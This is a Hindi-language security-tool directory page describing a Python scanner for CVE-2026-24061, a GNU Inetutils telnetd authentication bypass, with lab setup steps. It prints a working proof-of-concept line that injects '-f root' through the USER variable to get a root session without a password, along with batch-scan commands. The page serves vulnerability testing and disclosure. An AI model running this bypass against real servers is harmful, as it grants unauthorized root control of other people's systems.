Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — Python-आधारित स्कैनर जो GNU Inetutils telnetd में CVE-2026-24061 का पता लगाता है, जिससे प्रमाणीकरण बायपास भेद्यता के लिए कई लक्ष्यों का बैच परीक्षण संभव होता है। | Kitploit
उपकरण/GitHubGitHub/monstertsl/cve-2026-24061
भेद्यता स्कैनरशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरिमोट एक्सेस टूल
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Python-आधारित स्कैनर जो GNU Inetutils telnetd में CVE-2026-24061 का पता लगाता है, जिससे प्रमाणीकरण बायपास भेद्यता के लिए कई लक्ष्यों का बैच परीक्षण संभव होता है।

रिपॉजिटरी देखें
147 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 भेद्यता बैच जांच उपकरण

⚠️ ध्यान दें: CVE-2026-24061 GNU Inetutils GNU परियोजना द्वारा प्रदान किया गया एक क्लासिक नेटवर्क टूल संग्रह है, जिसमें telnetd सेवा शामिल है, अर्थात Telnet सर्वर डेमॉन। संस्करण 1.9.3 से 2.7 में, telnetd सेवा में उपयोगकर्ता प्रमाणीकरण प्रक्रिया में एक गंभीर दोष है। यह सेवा सिस्टम लॉगिन प्रोग्राम /usr/bin/login को कॉल करते समय, क्लाइंट द्वारा भेजे गए USER पर्यावरण चर को प्रभावी ढंग से फ़िल्टर और सत्यापित नहीं करती है। हमलावर एक विशेष USER चर मान सेट करके, -f पैरामीटर को सीधे login कमांड में इंजेक्ट कर सकता है। login प्रोग्राम का -f पैरामीटर "द्वितीयक प्रमाणीकरण छोड़ने" के लिए उपयोग किया जाता है, जिससे हमलावर सभी पासवर्ड सत्यापन चरणों को पूरी तरह से बायपास कर सकता है और सीधे root उपयोगकर्ता के रूप में एक दूरस्थ सत्र स्थापित कर सकता है, जिससे सर्वर का उच्चतम नियंत्रण प्राप्त होता है। यह भेद्यता अत्यंत खतरनाक है, जो एक सार्वजनिक, बिना किसी क्रेडेंशियल के दूरस्थ root बैकडोर के समान है।

भेद्यता जांच POC

root@kitploit:~
USER='-f root' telnet -a <target_ip>

जांच स्क्रिप्ट

demo.png

एकल जांच

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

बैच जांच

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

भेद्यता का सिद्धांत

उपरोक्त कमांड पर्यावरण चर USER को -f root पर सेट करता है। जब भेद्यता वाली telnetd सेवा कनेक्शन प्राप्त करती है, तो यह निम्नलिखित जैसा सिस्टम कॉल बनाती और निष्पादित करती है:

पुनरुत्पादन चरण

1. आवश्यक प्रोग्राम स्थापित करें

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. telnet लाइन की टिप्पणी हटाएं (सुनिश्चित करें कि प्रारूप सही है)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. सेवा पुनः प्रारंभ करें

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. पोर्ट जांचें

root@kitploit:~
sudo ss -tuln | grep ':23'

5. स्थानीय परीक्षण

root@kitploit:~
telnet localhost 23
टूल डाउनलोड करें